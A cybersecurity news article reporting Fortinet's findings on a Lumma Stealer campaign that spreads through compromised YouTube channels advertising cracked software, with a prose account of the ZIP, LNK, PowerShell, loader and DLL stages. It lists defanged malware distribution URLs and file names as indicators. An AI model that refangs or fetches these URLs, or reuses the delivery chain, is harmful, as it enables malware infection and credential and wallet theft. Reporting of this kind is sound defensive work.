Threat actors are deploying YouTube channels as a clandestine conduit for disseminating a variant of Lumma Stealer.
The attackers strategically compromised YouTube accounts, disgusting their activities by uploading videos seemingly offering cracked software applications. These videos contain embedded malicious URLs, enticing users to download a ZIP file cleverly named ‘installer_Full_Version_V.1f2.zip.’
Attackers regularly update the files on open-source platforms like GitHub and MediaFire to avoid detection.
Cybersecurity researchers from Fortinet exposed the attack chain. Upon downloading the ZIP file, victims unknowingly initiate a multi-stage attack. An LNK file within ZIP calls PowerShell to fetch a private .NET loader from a GitHub repository named ‘New,’ owned by an individual whom the researchers identified as John132456. The malicious payload is discreetly downloaded from a shortened URL, ‘hxxp://cutt[.]ly/lwD7B7lp,’ leading to the initial vector, ‘hxxps://github[.]com/John1323456/New/raw/main/Installer-Install-2023_v0y.6.6[.]exe.’

The .NET loader, obfuscated with SmartAssembly, employs advanced techniques to evade detection. It leverages PowerShell to execute discreetly, employing properties like RedirectStandardInput, CreateNoWindow, and UseShellExecute to run without displaying a command prompt window.
The PowerShell script, extracted by the loader, dynamically fetches encrypted binary data from multiple servers based on the system date. It then decrypts and decompresses the data, obtaining a DLL file for the next stage.
The DLL file, ‘Agacantwhitey.dll,’ is crucial to Lumma Stealer’s attack chain. It employs anti-VM and anti-debugging techniques, examining the environment, active windows, sandbox, usernames, and virtualisation platforms to ensure stealth.

The Lumma Stealer variant, written in C language and sold on underground platforms, exfiltrates sensitive information from the victim’s system, including browsers, crypto wallets, and browser extensions. It establishes communication with a command and control server to enhance evasion, now using HTTPS for data exfiltration.
Threat actors have used various delivery methods to distribute Lumma Stealer. In October, we reported that hackers use Discord’s Content Delivery Network to disseminate Lumma Stealer.
Researchers have cautioned users to avoid clicking on random links on the internet and avoid downloading files from unauthorized sources.
In the News: WiFi Alliance has begun certifying devices with WiFi 7